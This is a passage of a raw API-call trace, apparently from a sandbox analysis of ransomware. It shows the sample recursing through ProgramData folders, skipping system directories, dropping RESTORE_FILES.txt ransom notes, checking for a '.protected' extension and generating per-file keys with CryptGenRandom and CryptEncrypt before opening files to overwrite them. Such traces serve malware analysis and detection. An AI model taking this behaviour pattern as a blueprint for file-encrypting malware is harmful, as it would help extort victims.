lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.297] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 
[0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\.") returned 61 [0093.297] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.297] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.297] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.297] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.297] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.297] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\..") returned 62 [0093.297] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.297] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt") returned 77 [0093.297] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.297] lstrcmpW (lpString1="RESTORE_FILES.txt", 
lpString2="RESTORE_FILES.txt") returned 0 [0093.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.297] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt") returned 77 [0093.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\sentitems\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.297] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="Program Files") returned 1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="Program Files (x86)") returned 1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="$Recycle.bin") returned 1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="System Volume Information") returned 1 [0093.298] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 62 [0093.298] lstrcmpW (lpString1="VirtualInbox", lpString2=".") returned 1 [0093.298] lstrcmpW (lpString1="VirtualInbox", lpString2="..") returned 1 [0093.298] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned 64 [0093.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows 
NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.298] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.298] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.298] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.298] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.298] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\.") returned 64 [0093.298] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.298] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.298] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.298] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.298] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.298] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.298] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\..") returned 65 [0093.298] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.298] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.298] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.298] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.298] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.298] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 
[0093.298] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.298] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 68 [0093.298] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.298] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.298] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned 70 [0093.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.298] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.299] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.299] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.299] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\.") returned 70 [0093.299] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.299] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.299] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.299] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.299] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.299] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.299] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\..") returned 71 [0093.299] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.299] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.299] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt") returned 86 [0093.299] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.299] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.299] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Windows") returned -1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Program Files") returned 1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Program Files (x86)") returned 1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="$Recycle.bin") returned 1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="System Volume Information") returned 1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") 
returned 83 [0093.299] StrStrIW (lpFirst="WelcomeFax.tif", lpSrch=".protected") returned 0x0 [0093.299] lstrcmpW (lpString1="WelcomeFax.tif", lpString2="RESTORE_FILES.txt") returned 1 [0093.299] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.299] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.299] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.299] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt") returned 86 [0093.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.300] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") 
returned 1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.300] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt") returned 80 [0093.300] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.300] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.300] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.300] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.300] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt") returned 80 [0093.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.300] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.300] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt") returned 67 [0093.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt" (normalized: "c:\\users\\all 
users\\microsoft\\windows nt\\msfax\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.301] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="Windows") returned -1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="Program Files") returned -1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="Program Files (x86)") returned -1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="$Recycle.bin") returned 1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="System Volume Information") returned -1 [0093.301] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned 50 [0093.301] lstrcmpW (lpString1="MSScan", lpString2=".") returned 1 [0093.301] lstrcmpW (lpString1="MSScan", lpString2="..") returned 1 [0093.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*") returned 52 [0093.301] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.301] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.301] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.301] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.301] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.301] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\.") returned 52 [0093.301] lstrcmpW (lpString1=".", 
lpString2=".") returned 0 [0093.301] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.302] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.302] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.302] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.302] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.302] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.302] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\..") returned 53 [0093.302] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.302] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.302] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.302] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt") returned 68 [0093.302] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.302] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.302] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.302] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Windows") returned -1 [0093.302] 
lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Program Files") returned 1 [0093.302] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Program Files (x86)") returned 1 [0093.302] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="$Recycle.bin") returned 1 [0093.302] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="System Volume Information") returned 1 [0093.302] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 66 [0093.302] StrStrIW (lpFirst="WelcomeScan.jpg", lpSrch=".protected") returned 0x0 [0093.302] lstrcmpW (lpString1="WelcomeScan.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0093.302] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.302] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.302] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.302] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.303] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt") returned 68 [0093.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\restore_files.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.303] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.303] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\RESTORE_FILES.txt") returned 61 [0093.303] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.303] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.303] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.303] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.303] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\RESTORE_FILES.txt") returned 61 [0093.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.304] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", 
lpString2="Windows") returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", lpString2="Program Files") returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", lpString2="Program Files (x86)") returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", lpString2="$Recycle.bin") returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", lpString2="System Volume Information") returned 1 [0093.304] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc") returned 40 [0093.304] lstrcmpW (lpString1="WwanSvc", lpString2=".") returned 1 [0093.304] lstrcmpW (lpString1="WwanSvc", lpString2="..") returned 1 [0093.305] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*") returned 42 [0093.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.305] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.305] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.305] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.305] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.305] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.305] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\.") returned 42 [0093.305] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.305] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.305] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.305] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0093.305] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, 
dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0093.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\." (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.305] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.305] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.305] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.305] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.305] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.305] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.305] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\..") returned 43 [0093.305] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.305] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.305] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.305] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.305] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0093.305] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0093.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\.." 
